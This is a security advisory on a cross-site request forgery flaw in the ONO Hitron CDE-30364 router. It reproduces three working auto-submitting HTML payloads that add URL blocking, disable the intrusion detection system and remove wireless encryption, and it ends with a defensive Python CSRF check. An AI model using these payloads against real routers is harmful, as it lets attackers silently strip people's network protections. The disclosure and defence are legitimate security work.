Hitron CDE-30364 Router Cross-Site Request Forgery Vulnerability


Published: 2013-09-27
Updated: 2013-10-01

Affected systems:
ono Hitron Technologies CDE-30364 3.1.0.8-ONO
Description:
--------------------------------------------------------------------------------
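The Hitron CDE-30364 is an ONO router whose device parameters are set and changed through a web management interface.

In Hitron CDE-30364 Router version 3.1.0.8, the web interface on TCP/IP port 80 has a CSRF vulnerability that allows router parameters to be changed. The default IP address of this ADSL router is 192.168.1.1.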

<*Source: Matias Mingorance Svensson
  *>

Test method:
--------------------------------------------------------------------------------

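Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!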

# Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability
# Date: 14-9-2013
# Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org
# Vendor Homepage:
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
# Tested on: Hitron Technologies CDE-30364
# Version HW: 1A
# Version SW: 3.1.0.8-ONO

-----------------------------------------------------------------------------------------
Introduction:
-----------------------------------------------------------------------------------------
Hitron Technologies CDE-30364 is a famous ONO Router using, also, a web
management interface in order to set and change device parameters.

The Hitron Technologies CDE-30364's web interface (listening on TCP/IP port
80) is prone to CSRF vulnerabilities which allow changing router
parameters and performing many modifications to the router's parameters.
The default IP address of this ADSL router, used for management purposes, is
192.168.1.1.

-----------------------------------------------------------------------------------------
Exploit-1: Enable/Disable Web Site Blocking and add new Key Word/URL
blocking(google in this case)
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin
%2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0=
0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre
ss5=0&trustedMAC=&keyword0=google">
</body>
</html>

-----------------------------------------------------------------------------------------
Exploit-2: Enable/Disable Intrusion Detection System
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat-
firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1">
</body>
</html>

-----------------------------------------------------------------------------------------
Exploit-3: Disable(None) Wireless Security Mode
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Wls?dir=admin
%2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000
0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0&
Encrypt_type=0">
</body>
</html>

-----------------------------------------------------------------------------------------
Many other changes can be performed.


--
Regards,
Matías Mingorance Svensson
*OWASP Foundation, Open Web Application Security Project*
https://www.owasp.org
http://es.linkedin.com/in/matiasms

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

ono
---
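The vendor has not yet provided a patch or upgrade. We recommend that users of this software keep watching the vendor's home page for the latest version: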

http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
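
A server-side check of the kind whose absence makes the /goform/ requests above forgeable, given as an added example (not code from Hitron, ONO or the advisory's author). The function names, the HMAC-derived per-session token and the csrf_token field are assumptions; only the /goform/ path prefix comes from the advisory.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

STATE_CHANGING_PREFIX = "/goform/"  # handler prefix seen in the advisory's requests


def issue_csrf_token(session_id: str, secret: bytes) -> str:
    """Per-session token the admin pages would embed in every settings form (assumed scheme)."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """True only if Origin (or, failing that, Referer) names the host being addressed."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source or source == "null":
        return False  # fail closed when the browser sends neither header
    return urlsplit(source).netloc.lower() == headers.get("Host", "").lower()


def allow_request(method, path, headers, form, session_id, secret) -> bool:
    """Decide whether a request to the management interface may change settings."""
    if not path.startswith(STATE_CHANGING_PREFIX):
        return True  # pages that do not change settings are out of scope here
    if method != "POST" or not same_origin(headers):
        return False
    expected = issue_csrf_token(session_id, secret)
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be recovered byte by byte.
    return hmac.compare_digest(supplied.encode(), expected.encode())


if __name__ == "__main__":
    secret, sid = b"constructed-demo-secret", "constructed-session-id"
    token = issue_csrf_token(sid, secret)
    # Constructed requests: one submitted by a third-party page, one by the router's own form.
    cross_site = {"Host": "192.168.1.1", "Origin": "http://other-site.example"}
    own_page = {"Host": "192.168.1.1", "Origin": "http://192.168.1.1"}
    print(allow_request("POST", "/goform/Firewall", cross_site, {}, sid, secret))
    print(allow_request("POST", "/goform/Firewall", own_page, {"csrf_token": token}, sid, secret))
```

Either check alone stops the auto-submitting forms shown in the advisory; applying both also covers browsers that omit Origin and Referer.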
